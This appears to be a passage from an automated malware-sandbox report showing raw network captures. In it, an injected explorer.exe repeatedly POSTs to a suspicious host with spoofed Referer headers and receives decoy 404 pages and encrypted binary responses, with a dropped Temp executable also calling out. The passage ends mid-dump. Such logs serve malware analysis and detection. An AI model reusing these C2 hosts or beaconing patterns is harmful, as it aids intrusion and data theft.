                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 280
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:44.097450018 CEST2141INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:44 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  18192.168.2.749770185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:44.185791969 CEST2142OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://jjrxemk.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 173
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:44.264659882 CEST2144INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:44 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 5f 9f 87 cd 29 80 78 51 a1 a2 8f 4c 3d d8 1c e0 32 02 50 08 e8 df e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 e1 8a 20 59 55 11 5c 03 25 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 5d ca cc 8a 44 d8 06 0e 45 67 14 7d 63 fb e0 04 89 f9 d4 57 80 90 70 89 ec 24 4d 6b 0e e1 a2 22 48 32 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 83 97 5f 96 da 19 d1 3a 2d 12 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 7d 87 4a 04 38 cd 78 14 2c de e8 b1 14 c5 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 c2 49 64 cd 25 5c 8d b7 1d 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 a5 32 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6e c9 ae d4 15 95 36 e1 48 50 67 7e 50 b8 81 be e5 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da 07 22 bd c8 ac ef 3f ef b2 a9 a6 cc b4 02 47 71 f5 66 3c 3d d0 9f cb 67 14 d8 97 24 c8 b9 fc f0 d4 e8 57 2d 88 d5 74 61 b4 7b 69 ad 66 43 80 1c b7 16 db 64 73 98 f5 51 cf 39 c5 da 87 f1 7d 87 70 f3 35 43 50 11 00 ac 07 1d 02 c1 b9 5a 97 82 fd 11 41 a6 b2 84 35 ce 39 83 ce 85 91 3e 94 d4 54 e5 2f 62 a2 22 27 c6 b9 0a d7 d9 1b c5 89 10 ee 8b ba d7 62 47 d8 ae 85 3a 9d 9b e1 d5 f5 de 38 7f 98 92 ff b0 6a 05 8f a5 0a 9f 36 6f 03 62 53 b5 f8 80 99 8b 84 80 3f 1d b8 3a c0 b4 a7 a4 d0 91 46 e8 81 2f 0d 4d 76 00 94 23 94 b6 07 e8 9a 4a 17 7a c5 42 14 7e 24 a0 84 ba 8b 65 7d bb 8e da 3b 33 f2 82 6c 27 b4 e3 e4 ce fd 5f 98 3b c4 fe da 3d 8f f5 3f 78 14 42 7b f9 e8 f0 85 a5 46 e5
                                                  Data Ascii: 1f66S(SW\/iP"&&grq|6?eIJ5~/ar"`g1Q5ih.Kw:i/+".]pW!RY8|!@+%gt_)xQL=2P0YObyT=a'4 YU\%nIXKg[Ge92)g z6]DEg}cWp$Mk"H2I?o|6NI[LeU[0z;+W~5=PVpGZlqV@q!Uvy_:-D%GkKm@NQ>[}J8x,v"JG0Z"?kQTJMQId%\$&Q#F<pvA>C/CbGB24VFv2Bbn6HPg~Pum6'NGc_,/DO9W%J}Tzl9\c=~"}h`1%@N!{K.iw]Ai/mv`pV>`|PTZ3z[ ^z&+(l%yw*C=;5"No?hs#9cw9iwN7&,X2wlH%f7-/^'Hg7+w&9c1P0{2%#49FwX?,SC;#vddOU^=i=p.oj"?Gqf<=g$W-ta{ifCdsQ9}p5CPZA59>T/b"'bG:8j6obS?:F/Mv#JzB~$e};3l'_;=?xB{F


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  19192.168.2.749771185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:46.453360081 CEST2676OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://efeydlty.org/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 347
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:46.533122063 CEST2677INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:46 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  2192.168.2.749778162.159.129.233443C:\Users\user\AppData\Local\Temp\C1B2.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  20192.168.2.749772185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:47.233247042 CEST2677OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://glvslni.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 328
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:47.312364101 CEST2679INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:47 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b c3 a7 86 38 b4 f2 a7 7c 2d f0 3a cb 8f 8c f5 cf 9b 2b 25 9b 16 ba eb 1b bb 1d 57 74 d2 eb 98 87 cd 23 80 78 51 a1 a2 8f d2 ee df 1c e0 12 02 50 08 08 d8 e2 30 a5 19 93 9b 97 4f f3 e0 e4 62 79 00 54 ea d6 d7 0c 3d 61 19 27 f4 d2 af 34 91 b4 b9 c1 82 20 59 57 11 5c 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f fc b7 a8 9f 96 98 8b 36 19 19 cb 8a f3 d8 05 0f 4e 86 19 7d 6f ab e1 04 89 63 7a 55 80 90 70 89 7f c8 4a 6b b6 e2 a2 22 48 42 d3 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 9b 84 c8 c3 e7 b2 ec 1c e1 0c 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 ec ef f7 0a 83 8b 71 91 e0 75 7e 64 19 a0 77 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa 6b 8a b2 e2 4b 6d ec 00 31 a5 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 fa 82 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 00 9d 82 ef d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 36 dd 3f 9d 43 cd 17 fe 2f 15 9f f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 68 aa cf 04 2a 95 36 56 0f 50 67 74 20 b9 87 f6 f4 81 de bb 34 6b 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 1f 3a 48 93 92 4e bd 44 ef fb c9 e3 de ea 50 38 02 97 b1 a4 57 25 57 b9 d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 00 fc ce 6e 47 b3 9a 4c 07 22 7d e6 a2 c6 62 b9 14 31 eb cd 40 24 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 04 dd be c6 83 41 5f 4f af b8 e8 01 be a2 57 ee 60 87 bd b7 6b 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 de 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da 07 22 bd c8 ac cf 3f ef ba a9 a6 cc b4 02 47 71 f5 66 3c 3d d8 bf cb 67 5c d8 97 24 c8 b9 fc f0 d4 e8 57 2d a6 a1 11 19 c0 7b 69 ad 06 5b 80 1c b7 36 db 64 73 82 f5 51 cf 3b c5 da 87 f1 7d 87 70 f3 35 43 50 11 00 ac 27 1d 02 a1 97 28 e4 f0 9e 11 41 a6 ca 87 35 ce 39 c3 ce 85 56 3b 38 a6 15 e4 c6 ce a9 22 27 90 32 fb 10 df b7 b7 c8 10 46 15 b1 97 4c c3 f9 8c e2 58 e9 9c b7 3d ef ce 38 1f c1 19 39 ec a8 01 8f 44 ea 9b bf 6e c0 53 5b 76 cb c4 bd 8f 46 84 7f 9c b8 6a f7 5b 61 67 85 1a aa 50 f1 33 0d 4d 9e 1f ed 23 97 05 42 e0 c9 1c 9c 4a be 99 95 43 d2 7c 6c b8 4f 4e 7d bb ad 45 43 37 86 96 3f d8 a1 f7 94 8f c9 3b cb 53 94 6d 9b 3d 70 e0 53 08 55 42 da 49 3b b1 85 2c 03 39
                                                  Data Ascii: 1f66S(SW\/iP"&&grq|6?eIJ5~/arR`g1Q5ih.Kw:i/+".]pW!RY8|-:+%Wt#xQP0ObyT=a'4 YW\|;fKMXKw[Ge)29E"|6N}oczUpJk"HBI?m|6NI^LdU[0zU5=PoV`GZdQJVqu~dwy'$X9:-C'GkKm1`#>[qJ8-,sqK0Z"?+QzJMQAd'\#&Q#2YBA6?C/fGB%4VF>"7"h*6VPgt 4k6'NGc:HNDP8W%WbJ}Tzl9\@nGL"}b1@$@N!;KnGA_OW`kg";kz{},zHB(yw+;5lo?hs#9Acw9kwN7&,XwlH%f4-ow^7Hg7;g&9c0{2%#49FwX?,SC"vddOU^=i=p.oj"?Gqf<=g\$W-{i[6dsQ;}p5CP'(A59V;8"'2FLX=89DnS[vFj[agP3M#BJC|lON}EC7?;Sm=pSUBI;,9


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  21192.168.2.749775185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:51.351222992 CEST4203OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://jbxuhdvj.net/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 263
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:51.428925991 CEST4204INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:51 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  22192.168.2.749776185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:51.540746927 CEST4205OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://axwrxhk.org/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 177
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:51.622433901 CEST4205INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:51 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  23192.168.2.749777185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:51.711175919 CEST4206OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://dkannuwrja.org/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 214
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:51.792746067 CEST4208INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:51 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 7f e2 46 aa 8f 8c f5 cf 9b 2b 25 9b f6 ba c9 1b b0 1c 67 74 d2 ff 95 87 cd 2b 80 78 51 a1 a2 8f 2c df d2 1c e0 32 02 50 08 08 d8 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 41 8f 20 59 55 11 5c 7c 3b 66 ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 bd 28 c6 8a 44 d8 06 0e 45 c7 1e 7d 6f fb e0 04 89 f9 d4 57 80 90 70 89 ec e4 4a 6b b6 f2 a2 22 48 52 df 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 